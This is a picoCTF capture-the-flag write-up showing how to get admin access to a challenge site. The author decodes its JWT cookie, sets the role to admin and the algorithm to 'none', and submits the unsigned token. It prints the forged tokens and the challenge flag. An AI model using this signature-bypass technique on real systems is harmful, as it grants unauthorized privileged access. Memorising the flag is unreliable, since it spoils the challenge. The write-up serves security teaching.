Write-up author: vreshco
Most web application developers use third party components without testing their security. Some of the past affected companies are:
Equifax (a US credit bureau organization) - breach due to unpatched Apache Struts web framework CVE-2017-5638
Mossack Fonesca (Panama Papers law firm) breach - unpatched version of Drupal CMS used
VerticalScope (internet media company) - outdated version of vBulletin forum software used
Can you identify the components and exploit the vulnerable one? The website is running here. Can you become an admin? You can login as test with the password Test123! to get started.
- Use the web browser tools to check out the JWT cookie.
- The JWT should always have two (2) . separators.
- First open the link given.
RESULT
- Since there's no register button, we can use the creds given at the description.
RESULT
- Clearly nothing to see here, let's get the token.
RESULT
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdXRoIjoxNjc1ODU1ODMyNjczLCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQ7IHJ2OjEwOS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwOS4wIiwicm9sZSI6InVzZXIiLCJpYXQiOjE2NzU4NTU4MzN9.hmtzP0PqB8HlJ4NbO6uffs3dc7TE2m64Bbsu8Df6T9o
- Decode that using this online tool.
- Let's try with the simple approach by changing the role value to "admin", then copy the encoded jwt token then paste it in to the webapp as our token.
RESULT
- Hmm.. we can use another approach by remove the algorithm used, we can change it to none. But since jwt.io can change the alg to none, because it's not in the database, we can use this jwt debugger.
CHANGE IT TO NONE
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNjc1ODU1ODMyNjczLCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQ7IHJ2OjEwOS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwOS4wIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjc1ODU1ODMzfQ
- Now login again as
test
, then after paste the token, remember jwt always have 2 dots (.), while we have one, let's add another dot at the end.
FINAL TOKEN
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNjc1ODU1ODMyNjczLCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQ7IHJ2OjEwOS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwOS4wIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjc1ODU1ODMzfQ.
RESULT
- Got the flag!
picoCTF{succ3ss_@u7h3nt1c@710n_bc6d9041}